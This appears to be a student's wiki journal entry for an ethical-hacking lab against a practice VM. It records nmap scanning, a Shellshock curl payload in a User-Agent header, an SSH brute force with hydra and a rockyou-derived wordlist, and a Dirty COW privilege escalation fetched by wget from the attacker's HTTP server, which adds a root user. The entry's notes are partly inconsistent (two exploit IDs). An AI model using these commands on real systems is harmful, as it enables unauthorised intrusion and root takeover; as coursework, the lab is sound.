Activity 4.1 Cupcake Hacking, Root Escalation - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki

How you determined the versions of the two services exposed by cupcake:

Running Sudo nmap -sV revealed that port 22 and 80 were open, servicing openssh and apache httpd. They showed the correct versions for the services as well. Visiting the ip address using a browser and checking chrome's network tab in the developer tools revealed that it was openssh version 5.3, protocol 2.; along with apache httpd version 2.2.15.

How you dealt with parsing nmap result with nmaptocsv:

using nmap, use the "-oG" option to output the results to a grepable file. then, use "nmaptocsv -i (file) -d "," to create a csv format listing for the information from the file. the comma within the command is the delimiter, separating it into columns by the comma. paste the results into a google sheets, then click the clipboard icon related to the paste event to split into columns.

The techniques you used to invoke remote code execution:

The searchsploit utility was used to list different exploits for different versions of linux and its services, and cgi-bin was chosen as the exploit target.

"curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/redhat-release' bash -s :'' http://10.0.5.23/cgi-bin/status"

"sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23"

the curl command was used to execute commands on the remote server, while everything following the echo was used to specify the commands. Echoing the contents of /bin/cat served the same purpose as using the cat command. Other commands are available in the /bin, /sbin, and /usr/sbin directories.

The generation of a list of passwords and subsequent ssh bruteforce "zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise" This command pulled a list of potential or historical passwords used by the samwise account.

"hydra -l samwise -P samwise.txt 10.0.5.23 -t 4 ssh"

Using this script, we brute forced the password and found that it was "samwisethebrave"

Transfer of files using python and wget, Compiling and running a privilege escalation exploit (It can be different than the demo!)

Root escalation method:

1: PC: searchsploit -m 49839.c - downloads the specified exploit to the machine

2: python3 -m http.server 8086 - has the machine act as a server at the specified port, open to http requests.

3: Remomte Machine (RM): wget http://10.0.99.103:8086/40839.c - Downloads the specified file at the listed server (our pc)

4: gcc 40839.c -o cow -lpthread -lcrypt - Compiles the code, ignoring errors stemming from the dashed lines/functions?.

5: ./cow - runs the compiled code, creating a new root user "firefart" with a password of your choosing.

6: you can now log into the new root user with the password you specified. use "id" to see the privileges.